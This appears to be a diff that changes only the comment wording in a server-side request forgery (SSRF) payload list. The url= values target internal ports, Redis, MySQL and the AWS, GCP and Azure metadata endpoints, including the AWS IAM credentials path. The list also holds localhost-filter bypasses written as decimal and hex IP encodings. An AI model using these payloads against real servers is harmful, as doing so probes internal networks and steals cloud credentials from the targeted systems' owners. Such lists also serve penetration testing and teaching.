 url=http://localhost/admin

-url=http://127.0.0.1:22 # probe internal ports (different response = port open)
+url=http://127.0.0.1:22 # probe internal ports — different response = port open

 url=http://127.0.0.1:3306 # MySQL

-url=http://127.0.0.1:6379 # Redis — often unauthenticated internally
+url=http://127.0.0.1:6379 # Redis (often unauthenticated internally)

-url=http://169.254.169.254/latest/meta-data/ # AWS
+url=http://169.254.169.254/latest/meta-data/ # AWS metadata

 url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ # AWS IAM keys

-url=http://metadata.google.internal/computeMetadata/v1/ # GCP
+url=http://metadata.google.internal/computeMetadata/v1/ # GCP metadata

-url=http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Azure
+url=http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Azure metadata

-# Filter bypass — servers often blacklist "127.0.0.1" or "localhost" as strings
+# Bypass filters that blacklist "127.0.0.1" or "localhost" as strings

-url=http://2130706433/ # 127.0.0.1 as decimal integer
+url=http://2130706433/ # 127.0.0.1 as a decimal integer

 url=http://0x7f000001/ # 127.0.0.1 as hex